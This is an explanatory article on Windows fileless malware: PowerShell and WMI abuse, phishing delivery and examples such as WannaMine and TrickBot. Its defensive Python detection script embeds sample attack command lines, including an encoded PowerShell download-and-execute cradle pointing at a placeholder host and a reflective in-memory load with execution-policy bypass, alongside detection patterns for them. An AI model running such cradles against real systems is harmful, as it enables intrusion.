Fileless Malware: The Tradeoff of Synergy and Security
By Ryan Mason
Microsoft Windows is a powerful and long-standing operating system with deep-rooted features that work throughout the system. Windows' .NET, PowerShell, and Windows Management Instrumentation (WMI) frameworks provide cohesiveness and control, enabling the creation of new features and integration across the system. However, as these frameworks grow in capabilities and features, malicious actors gain more opportunities to abuse them. Fileless malware is an increasingly common attack method that cyber groups use to break into and persist in systems without leaving a trace. In contrast to traditional malware, which installs itself on the hard drive as a file, fileless malware abuses the .NET and WMI frameworks to inject code and scripts directly into a system's memory without creating any files or interacting with the hard drive. This offers attackers several advantages: evasion of signature-based antimalware programs, persistence within the system, and greater difficulty in removing the malicious code.[1]
Fileless malware capitalizes on trusted and otherwise legitimate computer programs to exploit vulnerabilities and gain access to a system's memory, enabling it to propagate and achieve its objectives. It is often used in crypto mining and click fraud attacks.[2] Its use has increased in recent years due to the increase in trusted applications, on which this malware preys. This article explores the functionality of fileless malware, the associated threats it poses, and strategies for mitigating this cyber threat.
Like all malware, fileless malware requires an initial point of entry into a system. Attackers often leverage phishing campaigns to lure victims into clicking on malicious links. Once the link is clicked, the malicious code embeds itself within the memory of existing applications, such as web browsers, PDF viewers, or Microsoft Office, all without the need to download any files or interact with the local file system. On Windows systems, attackers may exploit two potent .NET programs: PowerShell and Windows Management Instrumentation (WMI).[3] Computers commonly fall victim to fileless malware through two primary avenues: phishing emails and malicious links.
The first method involves the propagation of malicious scripts within Excel or Word files, which are typically distributed through phishing emails to employees of large companies. These employees exchange such documents throughout the week, so they are more likely to open a malicious file without taking the proper precautions. Excel and Word files feature a built-in scripting interface that facilitates data analytics and advanced functionality, but this also creates an entry point for malicious actors to write scripts that interact directly with the computer.
The second infection vector is malicious links, which can be embedded in phishing emails that pose as communications from legitimate sources such as a bank or an employee's own company. When the recipient clicks on the link, the site merely needs to load to trigger a malicious background script, which embeds itself into the device.[4] Once a machine is infected, the malware may take one of two broad paths. The first is memory code injection, which inserts its code into the memory of otherwise benign applications. These attacks often exploit vulnerabilities within programs like Adobe Flash or Java, as well as web browsers, and the malicious operations occur within the framework of the host program rather than through a separate application created by the attacker. The second is Windows registry manipulation, which capitalizes on trusted Windows programs such as PowerShell or WMI to carry out commands. This approach can be substantially more devastating, given its increased difficulty of detection and remediation.[5]
Kaspersky researchers Santiago Pontiroli and Roberto Martinez aptly dubbed PowerShell access as "the Holy Grail for attackers".[6] PowerShell serves as a command-line tool that facilitates code execution, program execution, downloading, and deletion, all while maintaining the ability to load dynamically into memory without ever interacting with the hard drive.[7] Given that most of Microsoft's services natively interact with PowerShell, it often finds itself whitelisted in various scenarios. This affords it extensive access to data throughout the system. Normally, this level of synergy within a system is beneficial for computer speed, but when used maliciously this unfettered access can result in severe consequences. An ordinary user with control over their computer can execute programs, manipulate data, delete files, and navigate the file system, all through scripting via PowerShell input. Fileless malware leverages the same capabilities but with devastating effects.
Windows Management Instrumentation (WMI) is a low-level framework designed to facilitate communication between different software and systems. Due to its significant influence on system functions and minimal forensic footprint, it is notorious for its versatility in cyberattacks. Attackers can employ WMI for various purposes, including reconnaissance, virtual machine detection, code execution, lateral movement, and maintaining persistence.[8] WMI can be harnessed to establish a persistent, asynchronous backdoor. WMI can also be controlled remotely through the Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM), which extends an attacker's reach. Attacks on this service are appealing due to the broad range of computers running it (every computer running Windows 98 and later). Malicious scripts are easily disguised as routine system commands, and there is generally limited awareness of the vulnerabilities within the WMI service.[9]
While the scope of fileless malware is extensive, it is limited in that it cannot install any files to the hard drive. WannaMine is an example of this. As the name implies, it is a cryptojacking worm that infects systems in the same way as WannaCry, exploiting the EternalBlue vulnerability in older Windows devices to gain access. It then utilizes the Mimikatz toolset to harvest legitimate credentials. Neither EternalBlue nor Mimikatz touches the hard drive, and all commands are executed from the command line, which is what makes it fileless. This makes detection of the intrusion extremely difficult. However, it cannot perform crypto mining without installing software to do so. It can use script commands to install mining software onto the device, which gives anti-malware programs the chance to detect unusual activity on the device.[10]
Where fileless malware excels is in creating a path for more capable malware to enter systems. Koadic is a remote access trojan (RAT) that enables remote desktop access and code execution,[11] file transfer, Mimikatz for credential access, port scanning, and system information collection. More notably, Dyre, which evolved into the infamous TrickBot cyber gang, used fileless techniques to steal banking information from financial firms. It used living-off-the-land techniques like PowerShell scripting and legitimate components like the Windows Registry to evade detection.
To discover a fileless malware attack, nontraditional steps must be taken. Rather than indicators of compromise, victims should look for indicators of attack. Once in a system, an attacker will look for ways to escalate their privileges. They will do this through remote code execution, modifying Windows tools, and creating malicious scripts. It is important to understand and be on the lookout for suspicious activity within trusted applications.[12] New tools have been developed to detect these types of intrusions. Tools like Microsoft Defender have incorporated endpoint analysis to determine whether malicious activities are taking place within otherwise benign applications.[13]
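As an added illustration of the "indicators of attack" approach described above (and of the PowerShell and WMI behaviours discussed earlier), the following Python script scores constructed endpoint telemetry records for signs of fileless activity: an Office application or the WMI provider host spawning PowerShell, encoded command lines, download cradles, in-memory loading, hidden windows and execution-policy bypass. The script, the sample records and the indicator names are all constructed for this article; they are not part of any product mentioned here.

```python
import base64
import re

# Constructed sample telemetry (parent process plus command line), modelled on the
# process-creation and script-block logging an endpoint agent provides. These records
# are made up for this example; example.invalid is a reserved, non-resolving host name.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "WINWORD.EXE", "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c [Reflection.Assembly]::Load($bytes)"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell accepts abbreviated switch names, so match the common prefixes of -EncodedCommand.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator name plus the pattern checked against the effective (decoded) command line.
INDICATORS = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("in_memory_execution", re.compile(r"\bIEX\b|Invoke-Expression|Reflection\.Assembly|::Load\(", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event):
    """Return the list of indicators of attack triggered by one telemetry record."""
    hits = []
    parent = event["parent"].lower()
    if parent in OFFICE_PARENTS:
        hits.append("office_parent")   # Office document launching PowerShell (macro delivery)
    elif parent == "wmiprvse.exe":
        hits.append("wmi_parent")      # process launched via the WMI provider host
    effective = event["cmdline"]
    decoded = decode_encoded_command(effective)
    if decoded is not None:
        hits.append("encoded_command")
        effective += " " + decoded     # inspect the decoded payload as well
    hits += [name for name, pattern in INDICATORS if pattern.search(effective)]
    return hits

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["parent"], "->", score_event(ev) or "clean")
```

In practice the records would come from Sysmon, PowerShell script-block logging or an EDR agent, and a record accumulating several indicators is a stronger signal than any one of them alone.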
While mitigating an attack is significantly harder than with traditional malware, the steps to protect against fileless malware remain the same. It remains imperative that companies stay vigilant in their IT practices and train their employees to do the same. Continue practices that minimize a network's attack surface, enforce least-privilege access, and promptly apply any security patches to software on the network. The WannaMine virus exploits a 6-year-old vulnerability in Windows devices, and it is not the only malware to do so. Cyber firm BitSight conducted a study and found that companies running out-of-date browser software were twice as likely to experience a cyber-attack as companies with less than half of their computers running outdated software.[14]
Fileless malware poses a serious and growing threat in the cybersecurity landscape. As computers gain features, and the resources that support those features expand, so too does the attack surface available to attackers. Mitigating this threat requires regular system monitoring, network traffic analysis, strict firewall policies, employee security training, and proactive patch management. While traditional signature-based antivirus software cannot detect fileless malware, advanced endpoint detection tools show promise through their use of machine learning. As with any cyber threat, remaining vigilant and promptly addressing vulnerabilities are an organization's best defense against fileless malware.
[1] Walker, Aaron. “What Is Fileless Malware and How Do Attacks Occur? - G2.” G2, October 7, 2019. https://www.g2.com/articles/what-is-fileless-malware-and-how-attacks-occur.
[2] Elise. “How to Remove Fileless Malware.” Emsisoft, November 18, 2022. https://www.emsisoft.com/en/blog/32034/how-to-remove-fileless-malware/.
[3] Sudhakar, and Sushil Kumar. “An Emerging Threat Fileless Malware: A Survey and Research Challenges - Cybersecurity.” SpringerOpen, January 14, 2020. https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x.
[4] Walker, “What Is Fileless Malware and How Do Attacks Occur?”
[5] “What Is Fileless Malware? Examples, Detection and Prevention.” Fortinet. Accessed November 13, 2023. https://fortinet.com/resources/cyberglossary/fileless-malware.
[6] Pontiroli, Santiago M., and F. Roberto Martinez. “The TAO of .NET and POWERSHELL Malware.” Kaspersky, 2018. https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07202147/Pontiroli_Martinez-VB2015-2.pdf.
[7] Pontiroli and Martinez, “The TAO of .NET and POWERSHELL Malware.”
[8] Sudhakar and Kumar, “An Emerging Threat Fileless Malware.”
[9] Graeber, Matt. “Abusing Windows Management Instrumentation (WMI) to Build a Persistent ...” Black Hat, 2015. https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf?%3F%3F%3F%3F%3Futm_source=content.
[10] “Investigate WannaMine - Cryptojacking Worm.” Sophos, December 24, 2021. https://support.sophos.com/support/s/article/KB-000037977?language=en_US.
[11] “Post Exploitation with Koadic.” BRANDEFENSE, November 22, 2022. https://brandefense.io/blog/post-exploitation-with-koadic/.
[12] Pontiroli and Martinez, “The TAO of .NET and POWERSHELL Malware.”
[13] Diogenes, Yuri. “Investigating a Fileless Attack Using Microsoft Defender for Cloud.” Microsoft, October 28, 2021. https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/investigating-a-fileless-attack-using-microsoft-defender-for/ba-p/482994.
[14] Roberts, Paul. “Behind Breaches: Lots of Outdated Software.” Digital Guardian, July 26, 2017. https://www.digitalguardian.com/blog/behind-breaches-lots-outdated-software.